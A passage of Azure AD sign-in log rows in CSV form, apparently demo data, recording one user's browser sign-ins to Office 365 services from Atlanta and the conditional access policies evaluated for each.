'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",52a6664f-09a1-41b6-959f-775d28001000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,52a6664f-09a1-41b6-959f-775d28001000,SigninLogs,Sucess,33.7984581,-84.38828278
+1952,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:32.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,afc8469f-f0f8-0000-4780-ae07bd575770,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",52a6664f-09a1-41b6-959f-775d71041000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,52a6664f-09a1-41b6-959f-775d71041000,SigninLogs,Sucess,33.7984581,-84.38828278
+1953,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:39.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,620e3ec5-542e-44e5-9910-f7ced19fb84d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93ca542e-4eab-45c4-8608-b715d2341100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,93ca542e-4eab-45c4-8608-b715d2341100,SigninLogs,Sucess,33.7984581,-84.38828278
+1954,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:36.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,38e617cc-a4b6-4ecc-9b76-c9adca6148e7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",13ab9514-e229-4755-99bf-dc8889c31000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,13ab9514-e229-4755-99bf-dc8889c31000,SigninLogs,Failed,33.7984581,-84.38828278
+1955,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:34.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6ec7469f-f03e-0000-4704-aff082a6e6c6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6382c33b-18b0-46b9-982e-4aa9a1a20f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa9a1a20f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1956,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:27.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2f68ceb4-b158-4a71-b10a-a3dd2636251e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d774c493-40b1-4743-b785-3f4aadce1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d774c493-40b1-4743-b785-3f4aadce1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1957,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:36.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b367ab61-3649-4deb-a1d7-ee25dd00d462,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d774c493-40b1-4743-b785-3f4a02d01000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,d774c493-40b1-4743-b785-3f4a02d01000,SigninLogs,Sucess,33.7984581,-84.38828278
+1958,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,38e617cc-a4b6-4ecc-9b76-c9adca6148e7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93ca542e-4eab-45c4-8608-b715927c1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93ca542e-4eab-45c4-8608-b715927c1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1959,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6df5a33c-9d86-48d0-8fc8-59d124d0a459,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 